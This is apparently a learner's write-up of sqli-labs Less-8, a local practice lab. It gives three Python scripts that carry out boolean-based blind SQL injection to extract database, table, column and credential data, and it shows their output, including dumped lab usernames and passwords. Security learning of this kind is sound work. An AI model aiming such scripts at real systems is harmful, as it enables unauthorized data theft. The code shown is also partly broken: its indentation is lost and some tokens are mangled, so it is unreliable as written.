The following is the python script for the eighth level of sql-labs
Alas, it took a long time to debug
Python’s loops do not have {}, so when writing, you must pay attention to which one is nested, and the indentation must be done correctly without making mistakes. Otherwise, even if no error is reported, the running result will be wrong (╬▔ Pan▔)╯
import requests
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Accept': 'text/html,application/xhtml + xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8'
}
database_length = 0
database_name = ''
table_counts = 0
table_length = 0
table_name = ''
column_counts = 0
column_length = 0
column_name = ''
information_counts = 0
information_length = 0
information_name = ''
base_url = "http://127.0.0.1/sql-labs/Less-8/?id=1'"
# Database length
for i in range(1, 50):
payload = f' and length(database())={i} -- + '
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in..........' in response.text:
database_length = i
break
# Name database
for i in range(1, database_length + 1):
for m in range(65, 123):
payload = f' and substr(database(),{i},1)='{chr(m)}' -- + '
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You' in response.text:
database_name = database_name + chr(m)
break
#Number of tables
for i in range(1, 100):
payload = f' and (select count(table_name) from information_schema.tables where table_schema='security')={i} -- + '
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in..........' in response.text:
table_counts = i
break
#The length and name of the table
for i in range(1, table_counts + 1):
table_name = ''
for m in range(1, 50):
payload = f' and length((select table_name from information_schema.tables where table_schema='security' limit {i},1))={m} -- + '
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in..........' in response.text:
table_length = m
break
for m in range(1, table_length + 1):
for n in range(65, 123):
payload = f' and substr((select table_name from information_schema.tables where table_schema='security' limit {i},1),{m},1)='{chr(n)}' -- + '
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in..........' in response.text:
table_name = table_name + chr(n)
break
print(f'The name of table {i} is: ' + table_name.lower())
for a in range(1, 100):
payload = f' and (select count(column_name) from information_schema.columns where table_name='{table_name.lower()}' and table_schema='security')={a} -- + '
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in..........' in response.text:
column_counts = a
break
#The length name of each column
for b in range(1, column_counts + 1):
column_name = ''
for c in range(1, 50):
payload = f' and length((select column_name from information_schema.columns where table_name='{table_name.lower()}' and table_schema='security' limit {b},1))={c} -- + '
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in..........' in response.text:
column_length = c
break
for m in range(1, column_length + 1):
for n in range(65, 123):
payload = f' and substr((select column_name from information_schema.columns where table_name='{table_name.lower()}' and table_schema='security' limit {b},1),{m},1)='{chr (n)}' -- + '
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in..........' in response.text:
column_name = column_name + chr(n)
break
print(f'The name of column {b} is: ' + column_name.lower())
#The number, length, and name of the data under the column
for x in range(0, 100):
payload = f' and (select count({column_name.lower()}) from {table_name.lower()})={x} -- + '
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in..........' in response.text:
information_counts = x
break
for y in range(1, information_counts + 1):
information_name = ''
for z in range(1, 50):
payload = f' and length((select {column_name.lower()} from {table_name.lower()} limit {y},1))={z} -- + '
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in..........' in response.text:
information_length = z
break
for j in range(1, information_length + 1):
for k in range(65, 123):
payload = f' and substr((select {column_name.lower()} from {table_name.lower()} limit {y},1),{j},1)='{chr(k)}' -- + '
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in..........' in response.text:
information_name = information_name + chr(k)
break
print(f'The name of data {y} is: ' + information_name.lower())
print('The database name is: ' + database_name)
print('The number of tables in this database is:' + str(table_counts))
operation result
E:\python\python.exe "D:\python\test1\aql-labs\less-8 three.py" The name of Table 1 is: referers The name of column 1 is: referer The name of column 2 is: ip_address Column 3 is named: The name of Table 2 is: uagents The name of column 1 is: uagent The name of column 2 is: ip_address The name of column 3 is: username Column 4 is named: The name of Table 3 is: users The name of column 1 is: username The name of data 1 is: angelina The name of data 2 is: dummy The name of data 3 is: secure The name of data 4 is: stupid The name of data 5 is: superman The name of data 6 is: batman The name of data 7 is: admin The name of data 8 is: admin The name of data 9 is: admin The name of data 10 is: admin The name of data 11 is: dhakkan The name of data 12 is: admin The name of data 13 is: The name of column 2 is: password The name of data 1 is: ikillyou The name of data 2 is: pssword The name of data 3 is: crappy The name of data 4 is: stupidity The name of data 5 is: genius The name of data 6 is: moble The name of data 7 is: admin The name of data 8 is: admin The name of data 9 is: admin The name of data 10 is: admin The name of data 11 is: dumbo The name of data 12 is: admin The name of data 13 is: Column 3 is named: The name of data 1 is: The name of data 2 is: The name of data 3 is:
When you first learn to write, it may not be good.
I also saw a code that was much better than mine
# 1. Set global variables DIS and list to control the display of detailed information and define the ASCII codes that need to be blasted
# 2. Explode the current database length
# 3. Define the database length blasting function Brute_length()
# 4. Explode the current database name
# 5. Define the database name blasting function Brute_database()
# 6. Explode all database lengths
# 7. Explode all database names
# 8. Explosion table name
# 9. Define the table name blasting function Brute_table()
# 10. Explode field names
# 11. Define field blasting function Brute_column()
# 12. Blasting data
# 13. Define the data blasting function data_dump()
import requests
import time
importsys
# 1. Set global variables DIS and list to control the display of detailed information and define the ASCII codes that need to be blasted.
DIS=True
list = [44, 46, 95, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58]
for i in range(97, 123):
list.append(i)
for i in range(64, 91):
list.append(i)
for i in range(33, 76):
list.append(i)
def sql_Inject(url, flag, display):
global DIS
DIS=display
# 2. Explode the current database length
current_length = Brute_length(url, flag, current=True)
print("Current database length:", current_length)
# 4. Explode the current database name
current_database_name = Brute_database(url, current_length, flag, current=True)
print("Current database name:", current_database_name)
# 6. Explode all database lengths
length = Brute_length(url, flag)
print("Database full length:", length)
# 7. Explode all database names
all_databases = input("Brute all the databases?[yes/no]: ")
if all_databases == 'yes':
database_name = Brute_database(url, length, flag)
print("Database name:", database_name)
# 8. Explosion table name
while True:
choose_database = input("choose the database: ")
table_name = Brute_table(url, choose_database, flag)
print("Database: %s" % choose_database)
print("Table: %s" % table_name)
print('')
next = input("continue brute the tables?[yes/no]: ")
if next == "no":
break
# 10. Explode field names
while True:
choose_database = input("choose the database: ")
choose_table = input("choose the table: ")
column_name = Brute_column(url, choose_database, choose_table, flag)
print("Table: %s.%s" % (choose_database, choose_table))
print("Field: %s" % column_name)
print('')
next = input("continue brute the columns?[yes/no]: ")
if next == "no":
break
# 12. Blasting data
while True:
choose_database = input("choose the database: ")
choose_table = input("choose the table: ")
choose_column = input("choose the column: ")
data = data_dump(url, choose_database, choose_table, choose_column, flag)
print("Field: %s.%s.%s" % (choose_database, choose_table, choose_column))
print("data: %s" % data)
print('')
next = input("continue dump the data?[yes/no]: ")
if next == "no":
break
# 13. Define the data blasting function data_dump()
def data_dump(url, database, table, column, flag):
raw_url = url
length=1
jump=10
data = ""
# First determine the data length
while True:
# url: http://127.0.0.1/sql-labs/Less-8/?id=1' and length((select group_concat(id) from security.emails))>10 -- +
url = raw_url + "' and length((select group_concat(%s) from %s.%s))>%d -- + " % (column, database, table, jump)
response = requests.get(url)
if DIS:
print(url)
if flag in response.content:
jump + = 10
else:
jump -= 10
break
while True:
# url: http://127.0.0.1/sql-labs/Less-8/?id=1' and length((select group_concat(id) from security.emails))>11 -- +
url = raw_url + "' and length((select group_concat(%s) from %s.%s))>%d -- + " % (column, database, table, jump + length)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
length + = 1
else:
break
data_length = length + jump
# Explosion data
for i in range(data_length):
for ASCII in list:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(id) from security.emails),1,1))='44' -- +
url = raw_url + "' and ord(substr((select group_concat(%s) from %s.%s),%d,1))=%d -- + " % (column, database, table, i + 1 , ASCII)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
data + = chr(ASCII)
break
# time.sleep(5)
return data
# 11. Define field blasting function Brute_column()
def Brute_column(url, database, table, flag):
raw_url = url
length=1
jump=10
column_name = ""
# First determine the field length
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails') )>10 -- +
url = raw_url + "' and length((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'))>%d -- + " % (database, table, jump)
response = requests.get(url)
if DIS:
print(url)
if flag in response.content:
jump + = 10
else:
jump -= 10
break
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>11 -- +
url = raw_url + "' and length((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'))>%d -- + " % (database, table, jump + length)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
length + = 1
else:
break
column_length = length + jump
# Explode field name
for i in range(column_length):
for ASCII in list:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails '),1,1))='44'-- +
url = raw_url + "' and ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'),%d,1))=%d -- + " % (database, table, i + 1, ASCII)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
column_name + = chr(ASCII)
break
# time.sleep(5)
return column_name
# 9. Define the table name blasting function Brute_table()
def Brute_table(url, database, flag):
raw_url = url
length=1
jump=10
table_name = ""
# First determine the length of the table name
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>10 -- +
url = raw_url + "' and length((select group_concat(table_name) from information_schema.tables where table_schema='%s'))>%d -- + " % (database, jump)
response = requests.get(url)
if DIS:
print(url)
if flag in response.content:
jump + = 10
else:
jump -= 10
break
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>11 -- +
url = raw_url + "' and length((select group_concat(table_name) from information_schema.tables where table_schema='%s'))>%d -- + " % (database, jump + length)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
length + = 1
else:
break
table_length = length + jump
# Explosion table name
for i in range(table_length):
for ASCII in list:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1 ))='44'-- +
url = raw_url + "' and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='%s'),%d,1))=%d -- + " % (database, i + 1 , ASCII)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
table_name + = chr(ASCII)
break
# time.sleep(5)
return table_name
# 5. Define the database name blasting function Brute_database()
def Brute_database(url, length, flag, current=False):
raw_url = url
database_name = ""
# 2. Explode the current database name
if current:
for i in range(length):
for ASCII in range(97, 123):
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr(database(),1,1))=97 -- +
url = raw_url + "' and ord(substr(database(),%d,1))=%d -- + " % (i + 1, ASCII)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
database_name + = chr(ASCII)
break
# time.sleep(5)
return database_name
# Explode all database names
# ' and ord(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=97-- +
else:
for i in range(length):
for ASCII in list:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=44-- +
url = raw_url + "' and ord(substr((select group_concat(schema_name) from information_schema.schemata),%d,1))=%d -- + " % (i + 1, ASCII)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
database_name + = chr(ASCII)
break
# time.sleep(5)
return database_name
# 3. Define the database length blasting function Brute_length()
def Brute_length(url, flag, current=False):
length=1
raw_url = url
jump=10
# Determine whether to blast the current database
if current:
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(database())>1 -- +
url = raw_url + "' and length(database())>%d -- + " % length
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
length + = 1
else:
break
return length
# Explode all database lengths
else:
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(schema_name) from information_schema.schemata))>10 -- +
url = raw_url + "' and length((select group_concat(schema_name) from information_schema.schemata))>%d -- + " % jump
response = requests.get(url)
if DIS:
print(url)
if flag in response.content:
jump + = 10
else:
jump -= 10
break
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(schema_name) from information_schema.schemata))>1 -- +
url = raw_url + "' and length((select group_concat(schema_name) from information_schema.schemata))>%d -- + " % (jump + length)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
length + = 1
else:
break
return (length + jump)
if __name__ == "__main__":
url = "http://127.0.0.1/sql-labs/Less-8/?id=1"
flag = b'You are in...'
display=False
sql_Inject(url, flag, display)
operation result
E:\python\python.exe D:\python\test1\aql-labs\less-8.py Current database length: 8 Current database name: security Database full length: 67 Brute all the databases?[yes/no]: yes Database name: information_schema,challenges,mysql,performance_schema,security,sys choose the database: security Database:security Table: emails,referers,uagents,users continue brute the tables?[yes/no]: no choose the database: security choose the table: users Table: security.users Fields: id, username, password continue brute the columns?[yes/no]: no choose the database: security choose the table: users choose the column: username,password Fields: security.users.username,password Data: DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4 continue dump the data?[yes/no]: no Process ended with exit code 0
This is obvious to others
However, these two types of code blasting are still a bit slow. You can use the dichotomy method
import requests
def decide():
left = 0
right = 9
while left <= right:
middle = (left + right) // 2
if 'You are in..........' in requests.request('get',
f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(length(database())), 1, 1)>{middle}, 1, 0 )-- + ").text:
left = middle + 1
elif 'You are in...' in requests.request('get',
f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(length(database())), 1, 1)<{middle}, 1, 0 )-- + ").text:
right=middle-1
else:
return middle
def ruler(size):
left = 0
right = 9
i=1
length = ''
while left <= right and i <= size:
middle = (left + right) // 2
if 'You are in..........' in requests.request('get',
f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(database()), {i}, 1)>{middle}, 1, 0) -- + ").text:
left = middle + 1
elif 'You are in...' in requests.request('get',
f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(database()), {i}, 1)<{middle}, 1, 0) -- + ").text:
right=middle-1
else:
i+=1
length + = str(middle)
left = 0
right = 126
return int(length)
def process(length):
left = 32
right = 126
i=1
result = ''
while left <= right and i <= length:
middle = (left + right) // 2
if 'You are in..........' in requests.request('get',
f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(ascii(substr(database(), {i}, 1))>{middle}, 1, 0) -- + ").text:
left = middle + 1
elif 'You are in...' in requests.request('get',
f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(ascii(substr(database(), {i}, 1))<{middle}, 1, 0) -- + ").text:
right=middle-1
else:
i+=1
result + = str(chr(middle))
left = 0
right = 126
print(result)
return result
if __name__ == '__main__':
size = decide()
length = ruler(size)
result = process(length)
This is just a part of the code, the running results are as follows
sec secu secur securi securit security Process ended with exit code 0